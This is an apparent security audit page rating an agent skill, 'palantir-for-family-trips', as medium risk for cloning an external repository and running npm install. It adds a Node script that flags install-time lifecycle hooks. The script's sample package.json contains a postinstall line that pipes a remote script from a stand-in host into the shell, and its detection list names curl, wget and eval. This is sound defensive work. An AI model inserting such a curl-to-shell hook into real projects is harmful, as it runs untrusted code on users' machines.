palantir-for-family-trips
Warn
Audited by Gen Agent Trust Hub on Apr 15, 2026
Risk Level: MEDIUM
Categories: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs the user to clone an entire codebase from a third-party GitHub repository (https://github.com/andrewjiang/palantir-for-family-trips.git). The source is external and unverified, so it presents a supply chain risk if the repository content is malicious or becomes compromised.
- [COMMAND_EXECUTION]: The setup process requires running several shell commands, including `npm install` and `npm run dev`. These commands execute scripts defined in the external repository's `package.json`: `npm install` runs lifecycle hooks such as `preinstall` and `postinstall` automatically, both for the repository itself and for every dependency it pulls in, and `npm run dev` runs whatever the `dev` script contains. Either could perform unauthorized actions on the local system.
- [REMOTE_CODE_EXECUTION]: By combining the cloning of a remote repository with a full package installation (`npm install`), the skill effectively allows code from an external source to execute on the user's machine.
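The check a practitioner would want before following the setup steps above is to read the cloned `package.json` and see which scripts `npm install` will run on its own and which the instructions ask the user to invoke. The Node script below is an added example, written for this page; it is not code from the Trust Hub audit or from the audited repository. The hook list, the `auditScripts` and `verdict` names, the keyword heuristics and the sample `package.json` are all assumptions made for illustration, and the sample is constructed, not the content of the repository named above.

```javascript
// Added example (not from the Trust Hub audit or the audited repository):
// list the scripts that a plain `npm install` in a cloned repository runs
// automatically, plus any script the setup instructions tell the user to run.

// Lifecycle hooks npm runs on a bare `npm install` in the package's own directory.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Crude indicators that a script fetches or evaluates code at run time.
// Assumed heuristics for this example; not an exhaustive or authoritative list.
const SUSPICIOUS = [
  /\bcurl\b/, /\bwget\b/, /\|\s*(ba)?sh\b/, /\beval\b/, /\bnode\s+-e\b/, /base64/,
];

// Returns one finding per script that would run, with its trigger and a
// flag for suspicious content. `invokedScripts` are the names the setup
// instructions tell the user to run explicitly (e.g. ["dev"]).
function auditScripts(packageJsonText, invokedScripts = []) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const name of Object.keys(scripts)) {
    const auto = INSTALL_HOOKS.includes(name);
    const invoked = invokedScripts.includes(name);
    if (!auto && !invoked) continue;
    const command = String(scripts[name]);
    findings.push({
      name,
      command,
      trigger: auto ? "npm install" : `npm run ${name}`,
      suspicious: SUSPICIOUS.some((re) => re.test(command)),
    });
  }
  return findings;
}

// "block": a script that would run matches a suspicious pattern;
// "review": install-time hooks exist and must be read before installing;
// "ok": nothing runs without the user explicitly asking for it.
function verdict(findings) {
  if (findings.some((f) => f.suspicious)) return "block";
  if (findings.some((f) => f.trigger === "npm install")) return "review";
  return "ok";
}

// Constructed sample package.json for illustration only. It is NOT the
// content of the repository named in the audit.
const SAMPLE = JSON.stringify({
  name: "sample-app",
  scripts: {
    postinstall: "curl -s https://example.invalid/setup.sh | sh",
    prepare: "husky install",
    dev: "next dev",
    build: "next build",
  },
});

const findings = auditScripts(SAMPLE, ["dev"]);
for (const f of findings) {
  const mark = f.suspicious ? "!!" : "  ";
  console.log(`${mark} ${f.name.padEnd(12)} runs on '${f.trigger}': ${f.command}`);
}
console.log("verdict:", verdict(findings));
```

Run it against the real `package.json` by replacing `SAMPLE` with the file's contents. Whatever the verdict, the dependency tree's own hooks are not covered by reading one file, so the safer installation is `npm install --ignore-scripts` (or `npm ci --ignore-scripts`) followed by a deliberate decision about which hooks, if any, to run afterwards.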
Audit Metadata